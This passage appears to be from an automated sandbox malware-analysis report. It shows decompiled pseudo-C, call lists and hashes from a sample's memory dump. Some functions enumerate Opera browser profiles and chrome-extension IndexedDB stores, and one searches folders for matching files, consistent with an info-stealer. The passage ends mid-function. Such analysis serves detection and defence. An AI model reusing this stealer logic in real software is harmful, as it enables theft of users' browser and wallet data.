                                                                    0x0040460d
                                                                    0x00404639
                                                                    0x0040463e
                                                                    0x00404644
                                                                    0x0040464a
                                                                    0x00404646
                                                                    0x00404646
                                                                    0x00404646
                                                                    0x00404651
                                                                    0x00404656
                                                                    0x0040465f
                                                                    0x00404664
                                                                    0x00404667
                                                                    0x00404669
                                                                    0x0040466c
                                                                    0x00404672
                                                                    0x00404674
                                                                    0x00404674
                                                                    0x00404676
                                                                    0x0040467f

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_catch_memmove
                                                                    • String ID:
                                                                    • API String ID: 3914490576-0
                                                                    • Opcode ID: 74f846dde16a26c75c1759dd4fb3cc2c5c58cd99a23e281b715338a03c4c37df
                                                                    • Instruction ID: b1c328258c057c5c2ebea97da91468bdd080ee36fc5cdf3542bc99f7bb980364
                                                                    • Opcode Fuzzy Hash: 74f846dde16a26c75c1759dd4fb3cc2c5c58cd99a23e281b715338a03c4c37df
                                                                    • Instruction Fuzzy Hash: 611127B0B00204AFDB24DF58D84071E77A2BBC0310F20453FE605AB2C1D779AE418B99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041462B Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E0041462B(void* __esi, void* __ebp, void* __eflags, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				char _t20;
				intOrPtr _t22;
				void* _t25;
				intOrPtr* _t26;
				void* _t29;
				void* _t31;

				_t31 = __esi;
				 *((intOrPtr*)(__esi + 0x30)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((intOrPtr*)(__esi + 0x14)) = 0x201;
				 *((intOrPtr*)(__esi + 0x18)) = 6;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 0x24)) = 0;
				 *((intOrPtr*)(__esi + 0x28)) = 0;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				 *((intOrPtr*)(__esi + 0xc)) = 0;
				_t26 = E0041E24D(_t25, _t29, 0, __esi, __eflags, 4);
				_pop(_t27);
				_t34 = _t26;
				if(_t26 == 0) {
					_t26 = 0;
					__eflags = 0;
				} else {
					_t22 = E0041D4D4(_t26, 0, __esi, _t34); // executed
					 *_t26 = _t22;
					_t27 = E0041D293();
					E0040E094(_t23);
				}
				_push(0x20);
				_push(_t31);
				 *((intOrPtr*)(_t31 + 0x30)) = _t26;
				 *((intOrPtr*)(_t31 + 0x38)) = _a8;
				 *((intOrPtr*)(_t31 + 0x3c)) = 0;
				_t20 = E00414754(_t26, _t27, 0, _t31, _t34);
				 *((char*)(_t31 + 0x40)) = _t20;
				if( *((intOrPtr*)(_t31 + 0x38)) == 0) {
					return E00413809(4, 0);
				}
				return _t20;
			}











                                                                    0x0041462b
                                                                    0x00414631
                                                                    0x00414634
                                                                    0x00414637
                                                                    0x0041463a
                                                                    0x00414641
                                                                    0x00414648
                                                                    0x0041464b
                                                                    0x0041464e
                                                                    0x00414651
                                                                    0x00414654
                                                                    0x00414657
                                                                    0x0041465f
                                                                    0x00414661
                                                                    0x00414662
                                                                    0x00414664
                                                                    0x0041467b
                                                                    0x0041467b
                                                                    0x00414666
                                                                    0x00414666
                                                                    0x0041466b
                                                                    0x00414672
                                                                    0x00414674
                                                                    0x00414674
                                                                    0x00414681
                                                                    0x00414683
                                                                    0x00414684
                                                                    0x00414687
                                                                    0x0041468a
                                                                    0x0041468d
                                                                    0x00414692
                                                                    0x00414698
                                                                    0x00000000
                                                                    0x0041469f
                                                                    0x004146a6

                                                                    APIs
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    • std::locale::_Init.LIBCPMT ref: 00414666
                                                                      • Part of subcall function 0041D4D4: __EH_prolog3.LIBCMT ref: 0041D4DB
                                                                      • Part of subcall function 0041D4D4: std::_Lockit::_Lockit.LIBCPMT ref: 0041D4F1
                                                                      • Part of subcall function 0041D4D4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041D513
                                                                      • Part of subcall function 0041D4D4: std::locale::_Setgloballocale.LIBCPMT ref: 0041D51D
                                                                      • Part of subcall function 0041D4D4: _Yarn.LIBCPMT ref: 0041D533
                                                                      • Part of subcall function 0041D4D4: std::locale::facet::_Incref.LIBCPMT ref: 0041D540
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 00414674
                                                                      • Part of subcall function 0040E094: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
                                                                    • String ID:
                                                                    • API String ID: 3761783024-0
                                                                    • Opcode ID: 39ac80b550bc547a8a91c4c97be01d75f8c8b00af7629e6db42e1b2b098ecbed
                                                                    • Instruction ID: 7a89e206c441c014fb0b50ba116f65a7f208eff19dc693b985901f760cf22b35
                                                                    • Opcode Fuzzy Hash: 39ac80b550bc547a8a91c4c97be01d75f8c8b00af7629e6db42e1b2b098ecbed
                                                                    • Instruction Fuzzy Hash: 09014CB0900B408FC730DF6B8181657FBF8BFE5718B10492FE29686A51D7B9A085CF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404719 Relevance: 3.0, APIs: 2, Instructions: 25COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E00404719(void* __edi, void* __esi, signed int _a4) {
				char _v16;
				void* _t10;
				void* _t15;
				void* _t18;

				_t10 = 0;
				if(_a4 > 0) {
					_t24 = _a4 - 0xffffffff;
					if(_a4 > 0xffffffff) {
						L3:
						_a4 = _a4 & 0x00000000;
						E0041DC00( &_v16,  &_a4);
						_v16 = 0x435264;
						return E0041FF86( &_v16, 0x440c30);
					}
					_t10 = E0041E24D(_t15, _t18, __edi, __esi, _t24, _a4); // executed
					if(0 == 0) {
						goto L3;
					}
				}
				return _t10;
			}







                                                                    0x0040471c
                                                                    0x00404724
                                                                    0x00404726
                                                                    0x0040472a
                                                                    0x00404739
                                                                    0x00404739
                                                                    0x00404744
                                                                    0x00404752
                                                                    0x00000000
                                                                    0x00404759
                                                                    0x0040472f
                                                                    0x00404737
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404737
                                                                    0x0040475f

                                                                    APIs
                                                                    • std::exception::exception.LIBCMT ref: 00404744
                                                                    • __CxxThrowException@8.LIBCMT ref: 00404759
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 4063778783-0
                                                                    • Opcode ID: 40c23939a32ff9c93c430c1e1bd220817e59737d2c66f8ab58fb27e12c73c030
                                                                    • Instruction ID: 10167cedd26b8403dd0ff800c48bbb355951d6bbe9f68e06b7cf2e3c94d28917
                                                                    • Opcode Fuzzy Hash: 40c23939a32ff9c93c430c1e1bd220817e59737d2c66f8ab58fb27e12c73c030
                                                                    • Instruction Fuzzy Hash: 72E065B5810209AACF10FF61C8416CE77A89B01399F20C27BA924991C0E7B89684CAD9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042637A Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E0042637A(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x445024, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x44568c;
					if( *0x44568c == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E004235E2(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00422147(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                                                    0x0042637f
                                                                    0x00426384
                                                                    0x004263a1
                                                                    0x004263a6
                                                                    0x004263a8
                                                                    0x004263aa
                                                                    0x004263ac
                                                                    0x004263ac
                                                                    0x004263ac
                                                                    0x00000000
                                                                    0x004263b4
                                                                    0x004263bd
                                                                    0x004263c3
                                                                    0x004263c5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004263f9
                                                                    0x004263fb
                                                                    0x00000000
                                                                    0x004263c7
                                                                    0x004263c7
                                                                    0x004263ce
                                                                    0x004263ec
                                                                    0x004263ef
                                                                    0x004263f1
                                                                    0x004263f3
                                                                    0x004263f3
                                                                    0x004263d0
                                                                    0x004263d1
                                                                    0x004263d7
                                                                    0x004263d9
                                                                    0x004263ad
                                                                    0x004263ad
                                                                    0x004263af
                                                                    0x004263b2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004263db
                                                                    0x004263db
                                                                    0x004263de
                                                                    0x004263e0
                                                                    0x004263e2
                                                                    0x004263e2
                                                                    0x004263e8
                                                                    0x004263e8
                                                                    0x004263d9
                                                                    0x00000000
                                                                    0x00426386
                                                                    0x0042638a
                                                                    0x0042638d
                                                                    0x00426390
                                                                    0x00000000
                                                                    0x00426392
                                                                    0x00426397
                                                                    0x004263a0
                                                                    0x004263a0
                                                                    0x00426390
                                                                    0x00000000

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042202F,?,?,00000000,00000000,00000000,?,00425EB7,00000001,00000214), ref: 004263BD
                                                                      • Part of subcall function 00422147: __getptd_noexit.LIBCMT ref: 00422147
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 328603210-0
                                                                    • Opcode ID: 0fe13994f006a54bff521e25f3763a03e4fe7c3eb7dc9fea1d87e76d178cba2e
                                                                    • Instruction ID: 4f76a42a0505025759db027c3360814d080dc93807ba604e5b2e7a593e419657
                                                                    • Opcode Fuzzy Hash: 0fe13994f006a54bff521e25f3763a03e4fe7c3eb7dc9fea1d87e76d178cba2e
                                                                    • Instruction Fuzzy Hash: 3D019E353016259BEF29DF26FC54B6B37A4AF81360F82452FAC15CA2D0CB78DC00C658
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00425D55 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000,0042D5A2,00445060,00000314,00000000,?,?,?,?,?,00423528,00445060,Microsoft Visual C++ Runtime Library,00012010), ref: 00425D57
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 42f16e99ded79a027ddd52576ae94823c66623e09604ede38b158fe54899fdd1
                                                                    • Instruction ID: d22a02c070d247f09f8bde68d63d1fe7ae76c8fa75cbefed771409745bc97bea
                                                                    • Opcode Fuzzy Hash: 42f16e99ded79a027ddd52576ae94823c66623e09604ede38b158fe54899fdd1
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0041208D Relevance: 70.3, APIs: 34, Strings: 6, Instructions: 344filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 83%
                                                                    			E0041208D(CHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				char _v1332;
				char _v1596;
				char _v1860;
				char _v2124;
				struct _WIN32_FIND_DATAA _v2444;
				intOrPtr _v2448;
				intOrPtr _v2452;
				intOrPtr _v2456;
				CHAR* _v2460;
				intOrPtr _v2464;
				void* _v2468;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t122;
				void* _t132;
				signed char _t154;
				signed char _t156;
				int _t158;
				signed char _t213;
				signed char _t218;
				signed char _t223;
				CHAR* _t241;
				CHAR* _t242;
				signed int _t243;
				void* _t244;
				void* _t245;
				void* _t251;

				_t240 = __edx;
				_t122 =  *0x443674; // 0x393162b1
				_v8 = _t122 ^ _t243;
				_v2448 = _a4;
				_v2456 = _a8;
				_t227 = __edx;
				_v2452 = _a12;
				_t242 = __ecx;
				_v2460 = __ecx;
				_v2464 = __edx;
				wsprintfA( &_v2124, "%s\\*.*", __edx);
				_t245 = _t244 + 0xc;
				if(_a20 != 0) {
					E00426300( &_v276, 0, 0x104);
					_t132 = _a20 - 1;
					if(_t132 == 0) {
						_push("Opera Stable");
						L24:
						lstrcatA( &_v276, ??);
						L25:
						_t241 = "%s\\%s\\%s\\%s";
						wsprintfA( &_v1860, _t241, _t227,  &_v276,  *0x445fd4, _t242);
						_t242 = "%s\\%s";
						wsprintfA( &_v1596, _t242,  &_v1860,  *0x445a8c);
						wsprintfA( &_v1332, _t241, _t227,  &_v276,  *0x445e54, _v2460);
						wsprintfA( &_v804, _t242,  &_v1332,  *0x445a8c);
						wsprintfA( &_v1068, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t227,  &_v276,  *0x445b64, _v2460);
						wsprintfA( &_v540, _t242,  &_v1068,  *0x445a8c);
						_t154 = GetFileAttributesA( &_v1596);
						if(_t154 != 0xffffffff && (_t154 & 0x00000010) == 0) {
							_t227 = _v2448;
							E00411DA6(_v2448, _v2456, _t240,  &_v1860, _v2452,  &_v276, _a16, 1);
						}
						_t156 = GetFileAttributesA( &_v804);
						if(_t156 != 0xffffffff && (_t156 & 0x00000010) == 0) {
							_t227 = _v2448;
							E00411DA6(_v2448, _v2456, _t240,  &_v1332, _v2452,  &_v276, _a16, 2);
						}
						_t158 = GetFileAttributesA( &_v540);
						if(_t158 != 0xffffffff && (_t158 & 0x00000010) == 0) {
							_t227 = _v2448;
							_t158 = E00411DA6(_v2448, _v2456, _t240,  &_v1068, _v2452,  &_v276, _a16, 3);
						}
						L34:
						return E0041DA9B(_t158, _t227, _v8 ^ _t243, _t240, _t241, _t242);
					}
					if(_t132 != 1) {
						goto L25;
					}
					_push("Opera GX Stable");
					goto L24;
				}
				_t158 = FindFirstFileA( &_v2124,  &_v2444);
				_v2468 = _t158;
				if(_t158 != 0xffffffff) {
					_t241 = "%s\\%s\\%s\\%s";
					_t242 = "%s\\%s";
					do {
						_push(".");
						_push( &(_v2444.cFileName));
						if( *0x446458() == 0) {
							goto L18;
						}
						_push("..");
						_push( &(_v2444.cFileName));
						if( *0x446458() != 0) {
							_t227 = 0x104;
							E00426300( &_v276, 0, 0x104);
							lstrcatA( &_v276,  &(_v2444.cFileName));
							wsprintfA( &_v540, _t241, _v2464,  &_v276,  *0x445fd4, _v2460);
							wsprintfA( &_v1068, _t242,  &_v540,  *0x445a8c);
							wsprintfA( &_v804, _t241, _v2464,  &_v276,  *0x445e54, _v2460);
							wsprintfA( &_v1332, _t242,  &_v804,  *0x445a8c);
							wsprintfA( &_v1596, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _v2464,  &_v276,  *0x445b64, _v2460);
							wsprintfA( &_v1860, _t242,  &_v1596,  *0x445a8c);
							_t251 = _t245 + 0x84;
							if(_a24 != 0) {
								_t223 = GetFileAttributesA( &_v1068);
								if(_t223 != 0xffffffff && (_t223 & 0x00000010) == 0) {
									E00411DA6(_v2448, _v2456, _t240,  &_v540, _v2452,  &_v276, _a16, 1);
									_t227 = 0x104;
								}
							}
							if(_a28 != 0) {
								_t218 = GetFileAttributesA( &_v1332);
								if(_t218 != 0xffffffff && (_t218 & 0x00000010) == 0) {
									E00411DA6(_v2448, _v2456, _t240,  &_v804, _v2452,  &_v276, _a16, 2);
									_t227 = 0x104;
								}
							}
							if(_a32 != 0) {
								_t213 = GetFileAttributesA( &_v1860);
								if(_t213 != 0xffffffff && (_t213 & 0x00000010) == 0) {
									E00411DA6(_v2448, _v2456, _t240,  &_v1596, _v2452,  &_v276, _a16, 3);
									_t227 = 0x104;
								}
							}
							E00426300( &_v540, 0, _t227);
							E00426300( &_v1068, 0, _t227);
							E00426300( &_v804, 0, _t227);
							E00426300( &_v1332, 0, _t227);
							E00426300( &_v1596, 0, _t227);
							E00426300( &_v1860, 0, _t227);
							_t245 = _t251 + 0x48;
						}
						L18:
					} while (FindNextFileA(_v2468,  &_v2444) != 0);
					_t158 = FindClose(_v2468);
				}
			}




































                                                                    0x0041208d
                                                                    0x00412096
                                                                    0x0041209d
                                                                    0x004120a5
                                                                    0x004120af
                                                                    0x004120b8
                                                                    0x004120bb
                                                                    0x004120c7
                                                                    0x004120cf
                                                                    0x004120d5
                                                                    0x004120db
                                                                    0x004120e1
                                                                    0x004120e8
                                                                    0x004123d1
                                                                    0x004123dc
                                                                    0x004123dd
                                                                    0x004123e9
                                                                    0x004123ee
                                                                    0x004123f5
                                                                    0x004123fb
                                                                    0x0041240a
                                                                    0x00412417
                                                                    0x0041242a
                                                                    0x00412437
                                                                    0x00412459
                                                                    0x00412477
                                                                    0x0041249d
                                                                    0x004124b8
                                                                    0x004124c8
                                                                    0x004124d1
                                                                    0x004124dd
                                                                    0x004124fc
                                                                    0x004124fc
                                                                    0x00412508
                                                                    0x00412511
                                                                    0x0041251d
                                                                    0x0041253c
                                                                    0x0041253c
                                                                    0x00412548
                                                                    0x00412551
                                                                    0x0041255d
                                                                    0x0041257c
                                                                    0x0041257c
                                                                    0x00412581
                                                                    0x0041258f
                                                                    0x0041258f
                                                                    0x004123e0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004123e2
                                                                    0x00000000
                                                                    0x004123e2
                                                                    0x004120fc
                                                                    0x00412102
                                                                    0x0041210b
                                                                    0x00412111
                                                                    0x00412116
                                                                    0x0041211b
                                                                    0x0041211b
                                                                    0x00412126
                                                                    0x0041212f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00412135
                                                                    0x00412140
                                                                    0x00412149
                                                                    0x0041214f
                                                                    0x0041215e
                                                                    0x00412174
                                                                    0x0041219b
                                                                    0x004121b6
                                                                    0x004121dd
                                                                    0x004121fb
                                                                    0x00412226
                                                                    0x00412241
                                                                    0x00412247
                                                                    0x0041224e
                                                                    0x00412257
                                                                    0x00412260
                                                                    0x0041228b
                                                                    0x00412290
                                                                    0x00412290
                                                                    0x00412260
                                                                    0x00412299
                                                                    0x004122a2
                                                                    0x004122ab
                                                                    0x004122d6
                                                                    0x004122db
                                                                    0x004122db
                                                                    0x004122ab
                                                                    0x004122e4
                                                                    0x004122ed
                                                                    0x004122f6
                                                                    0x00412321
                                                                    0x00412326
                                                                    0x00412326
                                                                    0x004122f6
                                                                    0x00412335
                                                                    0x00412347
                                                                    0x00412359
                                                                    0x0041236b
                                                                    0x0041237d
                                                                    0x0041238f
                                                                    0x00412394
                                                                    0x00412394
                                                                    0x00412397
                                                                    0x004123aa
                                                                    0x004123b8
                                                                    0x004123b8

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 004120DB
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004120FC
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00412127
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00412141
                                                                    • _memset.LIBCMT ref: 0041215E
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00412174
                                                                    • wsprintfA.USER32 ref: 0041219B
                                                                    • wsprintfA.USER32 ref: 004121B6
                                                                    • wsprintfA.USER32 ref: 004121DD
                                                                    • wsprintfA.USER32 ref: 004121FB
                                                                    • wsprintfA.USER32 ref: 00412226
                                                                    • wsprintfA.USER32 ref: 00412241
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00412257
                                                                      • Part of subcall function 00411DA6: wsprintfA.USER32 ref: 00411DE9
                                                                      • Part of subcall function 00411DA6: FindFirstFileA.KERNEL32(?,?), ref: 00411E00
                                                                      • Part of subcall function 00411DA6: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00411E2E
                                                                      • Part of subcall function 00411DA6: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00411E48
                                                                      • Part of subcall function 00411DA6: _memset.LIBCMT ref: 00411E60
                                                                      • Part of subcall function 00411DA6: _memset.LIBCMT ref: 00411E72
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411E87
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411E95
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411EA9
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EB7
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?), ref: 00411ED8
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EE6
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411EF9
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F07
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411F1A
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F28
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004122A2
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004122ED
                                                                    • _memset.LIBCMT ref: 00412335
                                                                    • _memset.LIBCMT ref: 00412347
                                                                    • _memset.LIBCMT ref: 00412359
                                                                    • _memset.LIBCMT ref: 0041236B
                                                                    • _memset.LIBCMT ref: 0041237D
                                                                    • _memset.LIBCMT ref: 0041238F
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 004123A4
                                                                    • FindClose.KERNEL32(?), ref: 004123B8
                                                                    • _memset.LIBCMT ref: 004123D1
                                                                    • lstrcatA.KERNEL32(?,Opera Stable), ref: 004123F5
                                                                    • wsprintfA.USER32 ref: 00412417
                                                                    • wsprintfA.USER32 ref: 00412437
                                                                    • wsprintfA.USER32 ref: 00412459
                                                                    • wsprintfA.USER32 ref: 00412477
                                                                    • wsprintfA.USER32 ref: 0041249D
                                                                    • wsprintfA.USER32 ref: 004124B8
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004124C8
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00412508
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00412548
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wsprintf$lstrcat$_memset$File$Attributes$Find$First$CloseNext
                                                                    • String ID: %s\%s$%s\%s\%s\%s$%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb$%s\*.*$Opera GX Stable$Opera Stable
                                                                    • API String ID: 2553220182-549290927
                                                                    • Opcode ID: f872b001391677ae39d342b492b5de03784d0af02598ae72d7d4cd58697e88e0
                                                                    • Instruction ID: d78126b9ff59cf83e8bdb547cd37f9e283cf866233b4c538abf8663ebc827e85
                                                                    • Opcode Fuzzy Hash: f872b001391677ae39d342b492b5de03784d0af02598ae72d7d4cd58697e88e0
                                                                    • Instruction Fuzzy Hash: 45D13AB190122DAFDF21DBA4DC89FDA777CBB09304F0004E6F618E2151E7759A998F68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040954D Relevance: 66.9, APIs: 35, Strings: 3, Instructions: 351stringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 41%
                                                                    			E0040954D(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, intOrPtr _a24, CHAR* _a28, int _a32, int _a36, intOrPtr _a40) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v1540;
				char _v1804;
				char _v2804;
				char _v7804;
				struct _WIN32_FIND_DATAA _v8124;
				intOrPtr _v8128;
				intOrPtr _v8132;
				intOrPtr _v8136;
				char* _v8140;
				char _v8144;
				void* _v8148;
				char _v8152;
				char _v8156;
				CHAR* _v8160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t107;
				intOrPtr _t111;
				char* _t117;
				int _t119;
				char* _t135;
				char* _t136;
				void* _t137;
				int _t144;
				int _t158;
				char* _t159;
				int _t163;
				int _t170;
				CHAR* _t185;
				int _t187;
				CHAR* _t194;
				void* _t208;
				void* _t211;
				void* _t216;
				void* _t217;
				char* _t226;
				void* _t227;
				CHAR* _t229;
				signed int _t230;
				void* _t231;
				void* _t232;
				char* _t233;
				void* _t255;

				_t227 = __edx;
				E0042E300(0x1fdc);
				_t107 =  *0x443674; // 0x393162b1
				_v8 = _t107 ^ _t230;
				_v8128 = _a4;
				_t229 = _a28;
				_v8136 = _a8;
				_t111 = _a12;
				_v8132 = _t111;
				_v8140 = _a16;
				_v8160 = _t229;
				wsprintfA( &_v1804, "%s\\*", _t111);
				_t232 = _t231 + 0xc;
				_v8148 = FindFirstFileA( &_v1804,  &_v8124);
				_t211 = 0x1388;
				_t117 =  &_v7804;
				do {
					 *_t117 = 0;
					_t117 = _t117 + 1;
					_t211 = _t211 - 1;
				} while (_t211 != 0);
				_t119 = lstrcatA( &_v7804, _t229);
				if(_v8148 == 0xffffffff) {
					L52:
					return E0041DA9B(_t119, 0, _v8 ^ _t230, _t227, 0x3e8, _t229);
				}
				do {
					_push(".");
					_push( &(_v8124.cFileName));
					if( *0x446458() == 0) {
						goto L50;
					}
					_push("..");
					_push( &(_v8124.cFileName));
					if( *0x446458() != 0 && E00409404(_v8132, _t227, 0x80000000) != 0) {
						 *0x4464d4( &_v276, _v8132);
						_t229 = 0x43c8e0;
						lstrcatA( &_v276, 0x43c8e0);
						lstrcatA( &_v276,  &(_v8124.cFileName));
						_t240 = _a36;
						if(_a36 != 0) {
							L9:
							_t216 = 0x3e8;
							_t135 =  &_v1540;
							do {
								 *_t135 = 0;
								_t135 = _t135 + 1;
								_t216 = _t216 - 1;
							} while (_t216 != 0);
							_t217 = 0x3e8;
							_t136 =  &_v2804;
							do {
								 *_t136 = 0;
								_t136 = _t136 + 1;
								_t217 = _t217 - 1;
							} while (_t217 != 0);
							_t137 =  *0x446458(_v8136, 0x43c8d8);
							_push( &(_v8124.cFileName));
							if(_t137 != 0) {
								_push(_v8136);
								wsprintfA( &_v2804, "%s\\%s");
								_t232 = _t232 + 0x10;
							} else {
								wsprintfA( &_v2804, "%s");
								_t232 = _t232 + 0xc;
							}
							_push( &_v7804);
							if( *0x446320() <= 3) {
								__eflags = _a36;
								if(_a36 == 0) {
									L44:
									_t144 = PathMatchSpecA( &(_v8124.cFileName), _v8140);
									__eflags = _t144;
									if(_t144 == 0) {
										goto L48;
									}
									 *0x4464d4( &_v540, _v8136);
									_push(_t229);
									goto L36;
								}
								_t163 = PathMatchSpecA( &(_v8124.cFileName), "*.lnk");
								__eflags = _t163;
								if(_t163 == 0) {
